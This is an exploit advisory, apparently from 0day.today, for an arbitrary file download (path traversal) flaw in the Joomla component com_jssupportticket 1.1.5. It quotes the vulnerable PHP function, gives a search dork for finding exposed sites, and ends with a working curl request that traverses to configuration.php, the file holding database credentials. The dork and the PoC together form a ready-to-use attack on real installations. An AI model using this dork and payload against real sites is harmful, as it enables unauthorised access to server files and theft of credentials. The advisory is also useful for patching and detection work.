Joomla JS Support Ticket Component (com_jssupportticket) 1.1.5 - Arbitrary File Downl

#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
#Dork: inurl:"index.php?option=com_jssupportticket"
#Exploit Author: qw3rTyTy
#Vendor Homepage: http://joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 1411 in file admin/models/ticket.php
 
  1382      function getDownloadAttachmentByName($file_name,$id){
  1383          if(empty($file_name)) return false;
  1384          if(!is_numeric($id)) return false;
  1385          $db = JFactory::getDbo();
  1386          $filename = str_replace(' ', '_',$file_name);
  1387          $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
  1388          $db->setQuery($query);
  1389          $foldername = $db->loadResult();
  1390  
  1391          $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
  1392          $base = JPATH_BASE;
  1393          if(JFactory::getApplication()->isAdmin()){
  1394              $base = substr($base, 0, strlen($base) - 14); //remove administrator    
  1395          }  
  1396          $path = $base.'/'.$datadirectory;
  1397          $path = $path . '/attachmentdata';
  1398          $path = $path . '/ticket/' . $foldername;
  1399          $file = $path . '/' . $filename;
  1400  
  1401          header('Content-Description: File Transfer');
  1402          header('Content-Type: application/octet-stream');
  1403          header('Content-Disposition: attachment; filename=' . basename($file));
  1404          header('Content-Transfer-Encoding: binary');
  1405          header('Expires: 0');
  1406          header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  1407          header('Pragma: public');
  1408          header('Content-Length: ' . filesize($file));
  1409          //ob_clean();
  1410          flush();
  1411          readfile($file);                //!!!
  1412          exit();
  1413          exit;
  1414      }
 
#####################################
#PoC:
#####################################
$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"
 
#  0day.today [2019-08-10]  #